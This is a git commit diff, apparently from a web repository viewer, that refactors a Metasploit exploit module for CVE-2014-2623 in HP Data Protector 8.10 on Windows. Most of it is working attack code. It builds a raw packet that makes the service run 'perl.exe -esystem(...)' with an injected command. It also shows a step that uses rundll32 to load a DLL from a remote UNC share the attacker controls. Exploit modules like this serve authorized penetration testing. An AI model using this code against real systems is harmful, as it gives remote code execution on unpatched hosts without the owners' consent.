Clean packet building
This commit is contained in:
parent
e04ff3ee24
commit
62dde22d88
|
@ -26,8 +26,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
'References' =>
|
'References' =>
|
||||||
[
|
[
|
||||||
['CVE', '2014-2623'],
|
['CVE', '2014-2623'],
|
||||||
|
['OSVDB', '109069'],
|
||||||
['EDB', '34066'],
|
['EDB', '34066'],
|
||||||
['URL', 'https://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c04373818'],
|
['URL', 'https://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c04373818']
|
||||||
],
|
],
|
||||||
'DefaultOptions' =>
|
'DefaultOptions' =>
|
||||||
{
|
{
|
||||||
|
@ -37,7 +38,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
'Platform' => 'win',
|
'Platform' => 'win',
|
||||||
'Targets' =>
|
'Targets' =>
|
||||||
[
|
[
|
||||||
[ 'HP Data Protector 8.10', { 'Offset' => 46 } ],
|
[ 'HP Data Protector 8.10 / Windows', { } ],
|
||||||
],
|
],
|
||||||
'DefaultTarget' => 0,
|
'DefaultTarget' => 0,
|
||||||
'DisclosureDate' => 'Nov 02 2014'))
|
'DisclosureDate' => 'Nov 02 2014'))
|
||||||
|
@ -90,21 +91,21 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
Rex::Text.to_ascii(resp).chop.chomp # Delete unicode last null
|
Rex::Text.to_ascii(resp).chop.chomp # Delete unicode last null
|
||||||
end
|
end
|
||||||
|
|
||||||
def exec_bar(cmd)
|
def send_pkt(cmd)
|
||||||
cmd.gsub!("\\", "\\\\\\\\")
|
cmd.gsub!("\\", "\\\\\\\\")
|
||||||
|
|
||||||
cmd_no = target['Offset'] + cmd.length
|
pkt = "2\x00"
|
||||||
|
pkt << "\x01\x01\x01\x01\x01\x01\x00"
|
||||||
pkt = "\x00\x00\x00"
|
pkt << "\x01\x00"
|
||||||
pkt << cmd_no
|
pkt << "\x01\x00"
|
||||||
pkt << "\x32\x00\x01\x01\x01\x01\x01\x01\x00\x01\x00\x01"
|
pkt << "\x01\x00"
|
||||||
pkt << "\x00\x01\x00\x01\x01\x00\x20\x32\x38\x00\x5c\x70"
|
pkt << "\x01\x01\x00 "
|
||||||
pkt << "\x65\x72\x6c\x2e\x65\x78\x65\x00\x20\x2d\x65\x73\x79\x73\x74\x65\x6d" # perl -e system('cmd')
|
pkt << "28\x00"
|
||||||
pkt << "('#{cmd}')" # Executable
|
pkt << "\\perl.exe\x00 "
|
||||||
pkt << "\x00"
|
pkt << "-esystem('#{cmd}')\x00"
|
||||||
|
|
||||||
connect
|
connect
|
||||||
sock.put(pkt)
|
sock.put([pkt.length].pack('N') + pkt)
|
||||||
disconnect
|
disconnect
|
||||||
end
|
end
|
||||||
|
|
||||||
|
@ -114,6 +115,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
|
|
||||||
print_status("#{peer} - Trying to execute remote DLL...")
|
print_status("#{peer} - Trying to execute remote DLL...")
|
||||||
sploit = "rundll32.exe #{unc},#{rand_text_numeric(1)}"
|
sploit = "rundll32.exe #{unc},#{rand_text_numeric(1)}"
|
||||||
exec_bar(sploit)
|
send_pkt(sploit)
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
Loading…
Reference in New Issue